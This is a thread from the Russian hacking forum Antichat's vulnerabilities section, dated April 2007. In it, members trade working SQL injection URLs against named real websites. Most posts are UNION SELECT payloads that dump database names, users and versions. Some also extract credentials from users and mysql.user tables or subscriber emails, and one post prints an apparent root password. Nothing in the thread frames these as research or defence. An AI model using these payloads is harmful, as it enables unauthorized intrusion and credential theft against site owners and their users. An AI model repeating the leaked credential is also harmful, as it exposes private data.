ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1621  
Старый 04.04.2007, 16:51
Grey
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию

Код:
http://www.dynamomania.com/news.php?p=message&id=-1+union+select+1,2,3,convert(concat(database(),char(58),user(),char(58),version()),char),5,6/*
http://www.dynamomania.com/news.php?p=message&id=-1+union+select+1,2,3,convert(concat(name,char(58),pwd,char(58),command,char(58),email,char(58),url,char(58),country,char(58),city),char),5,6+from+users+limit+0,1/*
А вот эта может уже и была...

Код:
http://www.web-segment.ru/index.php?p=-1+union+select+1,convert(concat(database(),char(58),user(),char(58),version()),char),3,4,5,6,7,8,9,10,11,12,13,14,15/*
 
Ответить с цитированием

  #1622  
Старый 04.04.2007, 17:08
Constantine
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869

Репутация: 3033


По умолчанию

Код:
http://c82.net/article.php?ID=-25+union+select+concat(version(),char(58),user()),2,3,4/*
чет с таблицами не получилось =\
+
Код:
http://www.dukemednews.org/news/article.php?id=-6041+union+select+concat(user,char(58),password),2,3,4,5,version(),7,8+from+mysql.user/*
__________________

Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!

з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ

Последний раз редактировалось Constantine; 04.04.2007 в 17:25..
 
Ответить с цитированием

  #1623  
Старый 04.04.2007, 17:56
en4cer
Познающий
Регистрация: 10.02.2006
Сообщений: 88
Провел на форуме:
574349

Репутация: 8
Отправить сообщение для en4cer с помощью ICQ
По умолчанию

Код:
http://freejob.ru/message_to_vacancy.php?id_m=-1'+UNION+SELECT+1,2,3,4,5,6,7,concat(user,0x3a,password),9,11,12,13,14,15,16,17,18,19,20+FROM+mysql.user/*
root:nhfdthcf
 
Ответить с цитированием

  #1624  
Старый 04.04.2007, 17:56
Grey
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию

Код:
http://bila.com.ua/price_view.php?price_id=-1+union+select+1,2,3,4,5,6,7,concat(database(),char(58),user(),char(58),version()),9,10,11,12,13,14/*
 
Ответить с цитированием

  #1625  
Старый 04.04.2007, 18:02
Constantine
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869

Репутация: 3033


По умолчанию

Код:
http://www.digitalidworld.com/modules.php?op=modload&name=News&file=article&sid=-89+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat_ws(char(58),version(),user(),database()),16,17,18,19,20,21,22,23/*&mode=chrono&order=0
Вывод в тайтле( сам чуть не прозевал=\)
Код:
http://www.michaeljfox.org/news/article.php?id=-5+union+select+convert(concat_ws(char(58),version(),user(),database())+using+latin1)/*
__________________

Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!

з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
 
Ответить с цитированием

  #1626  
Старый 04.04.2007, 18:45
Ksander
Постоянный
Регистрация: 21.06.2006
Сообщений: 931
Провел на форуме:
4836047

Репутация: 930


По умолчанию

Цитата:
Сообщение от Grey  
Код:
http://bila.com.ua/price_view.php?price_id=-1+union+select+1,2,3,4,5,6,7,concat(database(),char(58),user(),char(58),version()),9,10,11,12,13,14/*
бгг =)

Код:
http://bila.com.ua/price_list.php?searchtype=33&searchsub=-1+union+select+1,2,version()/*

www.f1-world.ru

5 мускуль
Код:
http://www.f1-world.ru/news/news.php3?idnews=-1+union+select+1,2,3,4,5,6,7,8,9,10,11/*

Последний раз редактировалось Ksander; 04.04.2007 в 19:31..
 
Ответить с цитированием

  #1627  
Старый 04.04.2007, 19:33
XenOtai
Познающий
Регистрация: 30.12.2006
Сообщений: 32
Провел на форуме:
383436

Репутация: 68
Отправить сообщение для XenOtai с помощью ICQ
По умолчанию

Код:
http://www.fpp-iis.ru/iss.php?page=-1+union+select+1,2,3,4,5,6/*

Возможно ли что-нибудь дальше?
 
Ответить с цитированием

  #1628  
Старый 04.04.2007, 19:49
LolFEm
Участник форума
Регистрация: 08.09.2006
Сообщений: 194
Провел на форуме:
1627025

Репутация: 163
По умолчанию

Цитата:
Сообщение от XenOtai  
Код:
http://www.fpp-iis.ru/iss.php?page=-1+union+select+1,2,3,4,5,6/*

Возможно ли что-нибудь дальше?
для mysql.user запрос не прокатил... может быть есть другая база данных...

SELECT command denied to user 'tib_ips'@'xxx.xxx.xxx.xxx' for table 'user'
 
Ответить с цитированием

  #1629  
Старый 04.04.2007, 19:56
alextoun
Постоянный
Регистрация: 07.05.2006
Сообщений: 732
Провел на форуме:
7910701

Репутация: 811


Отправить сообщение для alextoun с помощью ICQ
По умолчанию

Цитата:
http://www.f1-world.ru/news/news.php3?idnews=-1+union+select+1,table_name,3,4,5,6,7,8,9,10,11+fr om+information_schema.tables+limit+40,1/*
пока еду дальше

Цитата:
http://www.f1-world.ru/news/news.php3?idnews=-1+union+select+1,column_name,3,4,5,6,7,8,9,10,11+f rom+information_schema.columns+where+table_name=ch ar(120,95,111,114,100,101,114,115)+limit+19,1/*
заипался

Последний раз редактировалось alextoun; 04.04.2007 в 20:59..
 
Ответить с цитированием

  #1630  
Старый 04.04.2007, 20:53
Grey
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию

Код:
http://www.interfax-religion.ru/?act=news&div=-1+union+select+concat(database(),char(58),user(),char(58),version()),2,3,4,5,6,7,8,9,10,11,12,13/*
http://www.interfax-religion.ru/?act=news&div=-1+union+select+concat(id,char(58),email),2,3,4,5,6,7,8,9,10,11,12,13+from+subscribe+limit+0,1/*
Код:
http://askbook.kiev.ua/books.php?book=-1+union+select+1,concat(database(),char(58),user(),char(58),version()),3,4,5,6,7,8,9,10,11,12,13,14,15/*
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
 


Быстрый переход




ANTICHAT.XYZ